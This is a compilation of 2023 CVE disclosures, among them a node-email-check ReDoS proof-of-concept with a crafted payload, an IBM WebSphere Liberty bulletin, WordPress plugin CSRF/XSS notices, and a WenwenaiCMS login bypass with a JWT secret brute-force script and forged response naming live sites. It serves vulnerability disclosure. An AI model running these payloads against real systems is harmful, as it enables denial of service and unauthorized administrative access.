ReDos in NPMJS Node Email Check v.1.0.4 allows an attacker to cause a denial of service via a crafted string to the scpSyntax component.

The regex on line 10. inside https://github.com/teomantuncer/node-email-check/blob/main/main.js is vulnerable to a Regex Denial of Service

if a malicious string is provided causing the application using the package to hang.

Proof of concept code to test it:

const emailCheck = require('node-email-check');

// async request with mx check

//await emailCheck.isValid('example@email.com');

// sync request without mx check

console.time('\[ + \] Time passed -> ');

//payload

var chck = emailCheck.isValidSync('-@{IPv6:5:3:2:3:227IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"');

//var chck = emailCheck.isValidSync('validemail@example.com');

console.log(chck);

console.timeEnd('\[ + \] Time passed -> ');

CVE-2023-39619: Vulnerability inside the node-email-check npm package through version 1.0.4

IBM WebSphere Application Server Liberty 23.0.0.9 through 23.0.0.10 could provide weaker than expected security due to improper resource expiration handling.  IBM X-Force ID:  268775.

  

**Summary**

IBM WebSphere Application Server Liberty could provide weaker than expected security with the appSecurity-1.0, appSecurity-2.0, appSecurity-3.0, appSecurity-4.0 or appSecurity-5.0 feature enabled.

**Vulnerability Details**

**CVEID:**   CVE-2023-46158  
**DESCRIPTION:**   IBM WebSphere Application Server Liberty could provide weaker than expected security due to improper resource expiration handling.  
CVSS Base score: 4.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/268775 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM WebSphere Application Server Liberty

23.0.0.9 - 23.0.0.10

**Remediation/Fixes**

IBM strongly recommends addressing the vulnerability now by applying a currently available interim fix or fix pack that contains the APAR PH57579. To determine if a feature is enabled for IBM WebSphere Application Server Liberty, refer to How to determine if Liberty is using a specific feature. 

**For IBM WebSphere Application Server Liberty 23.0.0.9 - 23.0.0.10 using the the appSecurity-1.0, appSecurity-2.0, appSecurity-3.0, appSecurity-4.0 or appSecurity-5.0  feature(s):**   
· Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PH57579  
\--OR--  
· Apply Liberty Fix Pack 23.0.0.11 or later (targeted availability 4Q2023).

Additional interim fixes may be available and linked off the interim fix download page.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

24 Oct 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSEQTP","label":"WebSphere Application Server"},"Component":"Liberty","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF012","label":"IBM i"},{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF035","label":"z\\/OS"},{"code":"PF017","label":"Mac OS"}\],"Version":"Liberty","Edition":"Liberty","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2023-46158: Security Bulletin: IBM WebSphere Application Server Liberty could provide weaker than expected security (CVE-2023-46158)

Cross-Site Request Forgery (CSRF) vulnerability in Novo-media Novo-Map : your WP posts on custom google maps plugin <= 1.1.2 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Novo-Map : your WP posts on custom google maps Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-46190: WordPress Novo-Map : your WP posts on custom google maps plugin <= 1.1.2 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Simple Calendar – Google Calendar Plugin <= 3.2.5 versions.

**Solution**

 Fixed

Update the WordPress Google Calendar Events plugin to the latest available version (at least 3.2.6).

Nguyen Xuan Chien discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Google Calendar Events Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 3.2.6.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-46189: WordPress Google Calendar Events plugin <= 3.2.5 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Audimex 15.0.0 is vulnerable to Cross Site Scripting (XSS) in /audimex/cgi-bin/wal.fcgi via company parameter search filters.

CVE-2023-46396

TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formMeshUploadConfig.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-46542: Digging/TOTOLINK/X2000R/13/1.md at main · XYIYM/Digging

The Advanced Menu Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'advMenu' shortcode in versions up to, and including, 0.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2023-5085: class-advanced-menu-widget.php in advanced-menu-widget/trunk – WordPress Plugin Repository

Insecure Permissions vulnerability in WenwenaiCMS v.1.0 allows a remote attacker to escalate privileges.

**Product Name:**  
Wenwenai CMS

**Affect version:**  
1.0

Case Address:  
Demo：https://chat.wenwen-ai.com/  
Target：https://laoluoai.com/

**Vulnerability Type:**  
Logical Fallacies

**Description:**

Discover the backend login address through directory scanning, obtain the developer's demo site address on the login interface, log in and capture packets based on the account password provided by the demo site, and record the response packet of the login data packet.  
  
Based on the correct login return packet, the site can be found for JWT verification, and signature information can be guessed by blasting.

When logging in to the same source CMS login interface with an unknown account password, modify the login packet to the successful login packet information to achieve JWT verification and successfully log in to the backend.  
  
400 error is prompted when login information is not known. At this time, the returned data packet information can be modified to successful login data information to bypass login.

**Blasting:**

    import jwt
    import termcolor
    
    if __name__ == "__main__":
        jwt_str = R'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic'
        with open('topred.txt') as f:
            for line in f:
                key_ = line.strip()
                try:
                    jwt.decode(jwt_str, verify=True, key=key_)
                    print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                    break
                except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError,
                        jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError,
                        jwt.exceptions.ImmatureSignatureError):
                    print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                    break
                except jwt.exceptions.InvalidSignatureError:
                    print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
                    continue
            else:
                print('\r', '\bsorry！ no key be found!')
    

**Poc:**

    HTTP/1.1 200 OK
    Server: nginx/1.24.0
    Date: Tue, 10 Oct 2023 10:53:40 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 295
    Connection: close
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    ETag: W/"127-ZwpaZ2UCZyA1cCA/eHV9Dl6CgjI"
    Vary: Accept-Encoding
    
    {"code":200,"data":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic","success":true,"message":"请求成功"}

CVE-2023-45990: WenwenAiCms Vulnerability Testing · Issue #2 · PwnCYN/Wenwenai

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Emmanuel GEORJON EG-Attachments plugin <= 2.1.3 versions.

**Solution**

 No fix

No patched version is available.

Le Ngoc Anh discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress EG-Attachments Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-46070: WordPress EG-Attachments plugin <= 2.1.3 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Missing authentication in the SearchStudentsStaff  method in IDAttend’s IDWeb application 3.1.052 and earlier allows extraction sensitive student and teacher data by unauthenticated attackers. 

Discovered by Melodi Dey on behalf of The Missing Link Security

**Vulnerability Details**

Missing authentication in the SearchStudentsStaff method in IDAttend’s IDWeb application 3.1.013 allows extraction sensitive student and teacher data by unauthenticated attackers.   

**Affected Versions**

Discovered in: 3.1.013

**Fixed Versions**

Fixed in: 3.1.053

Source

CVE